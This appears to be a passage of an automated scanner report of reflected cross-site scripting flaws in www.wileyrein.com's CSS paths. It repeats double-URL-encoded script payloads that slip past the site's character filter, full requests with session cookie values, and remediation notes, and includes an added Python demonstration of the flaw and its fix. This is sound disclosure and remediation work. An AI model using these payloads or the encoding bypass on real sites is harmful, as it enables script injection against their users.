There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_main.cssf1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317 was submitted in the REST URL parameter 1. This input was echoed as de5e6"><script>alert(1)</script>848b9694317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssde5e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848b9694317/_navMenu.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 was submitted in the REST URL parameter 2. This input was echoed as 95db9"><script>alert(1)</script>aee734d6695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navMenu.css95db9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaee734d6695 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df was submitted in the REST URL parameter 1. This input was echoed as 25b68"><script>alert(1)</script>c5762ef40df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css25b68%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5762ef40df/_navSearch.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 was submitted in the REST URL parameter 2. This input was echoed as fd77a"><script>alert(1)</script>0a210746c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_navSearch.cssfd77a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a210746c61 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51 was submitted in the REST URL parameter 1. This input was echoed as 17ef6"><script>alert(1)</script>b4bcf499c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css17ef6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb4bcf499c51/_slide.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d was submitted in the REST URL parameter 2. This input was echoed as dfc8a"><script>alert(1)</script>df9115355d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_slide.cssdfc8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf9115355d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769 was submitted in the REST URL parameter 1. This input was echoed as 51eff"><script>alert(1)</script>085a170e769 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css51eff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e085a170e769/main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b was submitted in the REST URL parameter 2. This input was echoed as 78b32"><script>alert(1)</script>b5e2c8ed40b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/main.css78b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5e2c8ed40b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de was submitted in the REST URL parameter 1. This input was echoed as 78055"><script>alert(1)</script>a8d52b987de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de/ui/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
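The double-decoding failure that every finding in this section reports, modelled as an added Python example; this is not code from the scanner's report or from the application under test. The blacklist check, the redundant second URL-decode and the attribute sink are hypothetical stand-ins for the application's unknown code, chosen to reproduce the reported behaviour; the payload is the one the report submitted for REST URL parameter 1 of /css/ui/ui.accordion.css. The vulnerable path validates the once-decoded value and only then decodes again, so the blacklist never sees the characters that reach the page. The hardened path performs all canonicalisation first, validates the result, and HTML-attribute-encodes at the sink as defence in depth.

```python
from html import escape
from urllib.parse import unquote

# Payload copied from the report (REST URL parameter 1 of /css/ui/ui.accordion.css).
REPORT_PAYLOAD = "78055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8d52b987de"

# Characters a naive XSS blacklist rejects (assumed; the real filter's list is unknown).
BLOCKED = '<>"\''


def filter_passes(value: str) -> bool:
    """Naive blacklist validation: True if none of the blocked characters is present."""
    return not any(c in value for c in BLOCKED)


def server_decode(raw_path: str) -> str:
    """The web server URL-decodes the request path once before the application sees it."""
    return unquote(raw_path)


def render_attr(value: str) -> str:
    """The sink from the report: the value lands inside a double-quoted HTML attribute."""
    return f'<link rel="stylesheet" href="/css/{value}/ui.accordion.css">'


def vulnerable_render(raw_path: str) -> str:
    """Reported ordering: validate the once-decoded value, THEN decode a second time.

    %2522 survives the first decode as %22, which contains no blocked character,
    so the blacklist passes it; the second decode turns it into the double quote
    that terminates the attribute.
    """
    once = server_decode(raw_path)
    if not filter_passes(once):
        raise ValueError("blocked")
    twice = unquote(once)  # redundant 'custom canonicalisation' that re-opens the hole
    return render_attr(twice)


def canonicalise(raw_path: str) -> str:
    """Every decode the application will ever apply, collected in one place.

    The second decode is kept here only so the fix is purely one of ordering;
    as the report notes, dropping it altogether is the better option.
    """
    return unquote(server_decode(raw_path))


def hardened_render(raw_path: str) -> str:
    """Canonicalise to the final form first, validate that form, then encode at the sink."""
    canonical = canonicalise(raw_path)
    if not filter_passes(canonical):
        raise ValueError("blocked")
    # Output encoding is the real defence: even a value the blacklist missed
    # cannot break out of the attribute once " < > are entity-encoded.
    return render_attr(escape(canonical, quote=True))


def hardened_blocks(raw_path: str) -> bool:
    """Convenience wrapper: True if the hardened path rejects the value."""
    try:
        hardened_render(raw_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("once decoded :", server_decode(REPORT_PAYLOAD))
    print("canonical    :", canonicalise(REPORT_PAYLOAD))
    print("vulnerable   :", vulnerable_render(REPORT_PAYLOAD))
    print("hardened     :", "rejected" if hardened_blocks(REPORT_PAYLOAD) else hardened_render(REPORT_PAYLOAD))
```

Running the script prints the once-decoded value (`%22%3e%3cscript%3e...`, which the blacklist accepts), the canonical value (`"><script>alert(1)</script>`, exactly what the report says was echoed), the vulnerable output with the attribute broken open, and `rejected` for the hardened path. A quick regression check for this class of bug is to send the same probe single-, double- and triple-encoded and confirm the reflected form is identical in all three cases.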
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6 was submitted in the REST URL parameter 2. This input was echoed as 801be"><script>alert(1)</script>35c17289cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui801be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35c17289cf6/ui.accordion.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a was submitted in the REST URL parameter 3. This input was echoed as a2a82"><script>alert(1)</script>b61ee3f3a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.accordion.cssa2a82%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb61ee3f3a8a HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
